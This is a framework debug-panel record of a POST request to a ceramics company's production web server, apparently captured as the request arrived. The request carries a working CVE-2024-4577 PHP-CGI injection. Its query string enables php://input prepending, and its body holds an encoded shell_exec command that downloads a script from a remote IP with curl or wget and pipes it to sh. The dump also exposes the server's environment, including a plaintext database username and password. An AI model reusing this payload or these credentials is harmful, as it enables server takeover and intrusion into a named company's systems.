Request

General Info

Name	Value
method	'POST'
isAjax	false
isPjax	false
isFlash	false
isSecureConnection	true

Routing

Name	Value
Route	'site/error'
Action	'yii\\web\\ErrorAction::run()'
Parameters	[]

$_GET

Name	Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input	''

$_POST

Name	Value
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzY2LjYzLjE4Ny4xOTMvc2ggfHwgd2dldCBodHRwOi8vNjYuNjMuMTg3LjE5My9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA	'\")); echo(md5(\"Hello CVE-2024-4577\")); ?>'

$_FILES

Empty.

$_COOKIE

Empty.

Request Body

Name	Value
Content Type	'application/x-www-form-urlencoded'
Raw	'<?php shell_exec(base64_decode(\"WD0kKGN1cmwgaHR0cDovLzY2LjYzLjE4Ny4xOTMvc2ggfHwgd2dldCBodHRwOi8vNjYuNjMuMTg3LjE5My9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA=\")); echo(md5(\"Hello CVE-2024-4577\")); ?>'
Decoded	[ '<?php_shell_exec(base64_decode(\"WD0kKGN1cmwgaHR0cDovLzY2LjYzLjE4Ny4xOTMvc2ggfHwgd2dldCBodHRwOi8vNjYuNjMuMTg3LjE5My9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA' => '\")); echo(md5(\"Hello CVE-2024-4577\")); ?>' ]

Request Headers

Name	Value
content-length	'221'
content-type	'application/x-www-form-urlencoded'
connection	'keep-alive'
user-agent	'Custom-AsyncHttpClient'
upgrade-insecure-requests	'1'
accept	'/'
host	'103.15.51.164:443'

Response Headers

Name	Value
Set-Cookie	[ 0 => 'PHPSESSID=ni5b36aedqrd1b61h1uue5mq9q; path=/; HttpOnly' 1 => '_csrf=d64d9e9ef1d99d21f37c414cd95a157c15ae6cc32cf106b61ab1602ebc2aee27a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22A4qSTwRUM15OwusX2yqgI0Z9UMrrxAHM%22%3B%7D; path=/; HttpOnly; SameSite=Lax' ]
Expires	'Thu, 19 Nov 1981 08:52:00 GMT'
Cache-Control	'no-store, no-cache, must-revalidate'
Pragma	'no-cache'
Content-Type	'text/html; charset=UTF-8'
X-Debug-Tag	'6860a6e0a4baf'
X-Debug-Duration	'16'
X-Debug-Link	'/debug/default/view?tag=6860a6e0a4baf'

$_SESSION

Name	Value
__flash	[]

Flashes

Empty.

$_SERVER

Name	Value
USER	'www-data'
HOME	'/var/www'
HTTP_CONTENT_LENGTH	'221'
HTTP_CONTENT_TYPE	'application/x-www-form-urlencoded'
HTTP_CONNECTION	'keep-alive'
HTTP_USER_AGENT	'Custom-AsyncHttpClient'
HTTP_UPGRADE_INSECURE_REQUESTS	'1'
HTTP_ACCEPT	'/'
HTTP_HOST	'103.15.51.164:443'
REDIRECT_STATUS	'200'
SERVER_NAME	'3d.tiencuongceramic.com'
SERVER_PORT	'443'
SERVER_ADDR	'103.15.51.164'
REMOTE_PORT	'39802'
REMOTE_ADDR	'111.250.107.114'
SERVER_SOFTWARE	'nginx/1.14.0'
GATEWAY_INTERFACE	'CGI/1.1'
HTTPS	'on'
REQUEST_SCHEME	'https'
SERVER_PROTOCOL	'HTTP/1.1'
DOCUMENT_ROOT	'/var/www/vth/frontend/web'
DOCUMENT_URI	'/index.php'
REQUEST_URI	'/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input'
SCRIPT_NAME	'/index.php'
CONTENT_LENGTH	'221'
CONTENT_TYPE	'application/x-www-form-urlencoded'
REQUEST_METHOD	'POST'
QUERY_STRING	'%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input'
SCRIPT_FILENAME	'/var/www/vth/frontend/web/index.php'
PATH_INFO	''
FCGI_ROLE	'RESPONDER'
PHP_SELF	'/index.php'
REQUEST_TIME_FLOAT	1751164640.6676
REQUEST_TIME	1751164640
YII_DEBUG	'false'
YII_ENV	'production'
APP_MAINTENANCE	'0'
LINK_ASSETS	'true'
DB_DSN	'mysql:host=localhost;port=3306;dbname=tiencuong_db'
DB_USERNAME	'tiencuong_user'
DB_PASSWORD	'GL4yUXs3tLHrQXvJ'
DB_TABLE_PREFIX	''
DB_CHARSET	'utf8mb4'
API_HOST_INFO	'https://api-3d.tiencuongceramic.com'
FRONTEND_HOST_INFO	'https://3d.tiencuongceramic.com'
BACKEND_HOST_INFO	'https://admin-3d.tiencuongceramic.com'
STORAGE_HOST_INFO	'https://storage-3d.tiencuongceramic.com'
CDN_URL	'https://storage-3d.tiencuongceramic.com'
STORAGE_DATA	'data/tiencuong'
SMTP_HOST	'mailcatcher'
SMTP_PORT	'1025'
FRONTEND_COOKIE_VALIDATION_KEY	'<generated_key>'
BACKEND_COOKIE_VALIDATION_KEY	'<generated_key>'
ADMIN_EMAIL	'admin@yii2-starter-kit.localhost'
ROBOT_EMAIL	'robot@yii2-starter-kit.localhost'
GITHUB_CLIENT_ID	'your-client-id'
GITHUB_CLIENT_SECRET	'your-client-secret'
GLIDE_SIGN_KEY	'<generated_key>'
GLIDE_MAX_IMAGE_SIZE	'4000000'